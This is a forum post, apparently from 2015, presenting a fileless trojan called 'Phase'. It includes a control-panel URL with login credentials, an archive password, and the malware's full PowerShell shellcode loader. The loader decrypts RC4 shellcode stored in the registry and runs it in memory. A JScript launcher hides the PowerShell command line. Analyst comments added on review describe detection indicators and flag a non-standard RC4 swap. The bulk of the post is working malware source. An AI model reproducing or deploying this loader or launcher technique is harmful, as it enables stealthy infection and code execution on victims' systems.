Aerosol Posted January 5, 2015 Report Posted January 5, 2015
Hi,found a new trojan which call itself fileless. It injects RC4 encrypted code into explorer.exe, hooks NtQueryDirectoryFile with HLT-hook for hiding, uses (base64-decoded) Powershell stored in regedit and it's encrypted with RC4 and random key. Uses same technique as Poweliks for startup in regedit. AV-detection is very bad:
https://www.virustotal.com/en/file/438258d0710ddbb280a5a1ed801392a5194eaece16ba85591fe5eb4815bf56a8/analysis/1418147310/
Test Panel: http://phasesupport.com/phase/login.php - Phase:Phase
Powershell script:
# Analyst notes (added on review): this is the PowerShell stage that, per the post, is kept
# base64-encoded in the registry. It reads an RC4-encrypted shellcode blob from the same
# registry key, decrypts it in memory with the hard-coded key "Phase", and executes it inside
# the PowerShell process via VirtualProtect/CreateThread. No file write appears in this fragment.
# Detection surface visible here: the GUID-named Active Setup\Installed Components key below,
# the Rc4Encoded64 / Rc4Encoded32 values, Add-Type compiling kernel32 P/Invoke stubs at runtime,
# and powershell.exe launched with "iex $env:LoadShellCodeScript" (see the JScript launcher at the end).
$sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';
# The RC4 key is the ASCII bytes of the string "Phase" -- fixed in this stage. The "random key"
# the post mentions presumably belongs to a different layer; confirm against the sample.
[Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");
# C# P/Invoke declarations compiled by Add-Type. The kernel32 triple
# VirtualProtect + CreateThread + WaitForSingleObject is the classic in-process shellcode runner.
$sCode = @"
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);
[DllImport("kernel32.dll")]
public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
"@
$pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru
[Byte[]]$bShellCode;
# Architecture is chosen by pointer size; both blobs live as values under the key above.
if ([IntPtr]::Size -eq 8) {
    # Load Encrypted x64 Shellcode From Registry
    $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;
}
else{
    # Load Encrypted x86 Shellcode From Registry
    $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;
}
# RC4 key scheduling: $s is the state box, $k is the key repeated out to 256 bytes.
[Byte[]]$s = New-Object Byte[] 256;
[Byte[]]$k = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){
    $s[$i] = [Byte]$i;
    $k[$i] = $bKey[$i % $bKey.Length];
}
$j = 0;
for ($i = 0; $i -lt 256; $i++){
    $j = ($j + $s[$i] + $k[$i]) % 256;
    # NOTE(review): $bSwap is never assigned in this loop, so this is not a textbook RC4 swap
    # (presumably $s[$j] ends up as 0 here -- confirm). A stock RC4 implementation will therefore
    # not decode the Rc4Encoded* blobs; replicate this loop exactly when building an analysis decryptor.
    $s[$i] = $s[$j];
    $s[$j] = $bSwap;
}
# Keystream generation and XOR, applied in place to the registry blob.
$i = 0;
$j = 0;
for ($x = 0; $x -lt $bShellCode.Length; $x++){
    $i = ($i + 1) % 256;
    $j = ($j + $s[$i]) % 256;
    $bSwap = $s[$i];
    $s[$i] = $s[$j];
    $s[$j] = $bSwap;
    [int]$t = ($s[$i] + $s[$j]) % 256;
    $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];
}
$dwSize = $bShellCode.Length;
if ($dwSize -gt 0x00000000){
    [Int[]]$dwOldProt = 0x00000000;
    $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0)
    # 0x40 = PAGE_EXECUTE_READWRITE: the managed byte array itself is made executable and then
    # started as a new thread; the script blocks (-1 = INFINITE) until that thread exits.
    if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){
        $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0);
        $pFunctions::WaitForSingleObject($hThread, -1);
    }
}
// Launcher fragment (JScript for the Windows Script Host). The object is referenced as
// oWSShell below; the leading "o" on this first line was presumably lost in the paste -- confirm.
WSShell = new ActiveXObject("WScript.Shell");
sWindows = oWSShell.ExpandEnvironmentStrings("%windir%");
sPowerShell = sWindows + "\\system32\\windowspowershell\\v1.0\\powershell.exe";
oFile = new ActiveXObject("Scripting.FileSystemObject");
if (oFile.FileExists(sPowerShell)){
    // sPowerShellScript (the base64 form of the script above) is not defined in this fragment.
    // The script is passed to PowerShell through a process environment variable rather than on the
    // command line, so process-creation logs only show "iex $env:LoadShellCodeScript".
    (oWSShell.Environment("Process"))("LoadShellCodeScript") = "iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('" + sPowerShellScript + "')))";
    // Run(command, windowStyle 0 = hidden window, waitOnReturn 1 = block until PowerShell exits).
    oWSShell.Run(sPowerShell + " iex $env:LoadShellCodeScript", 0, 1);
}
phasepass: infected
Source Quote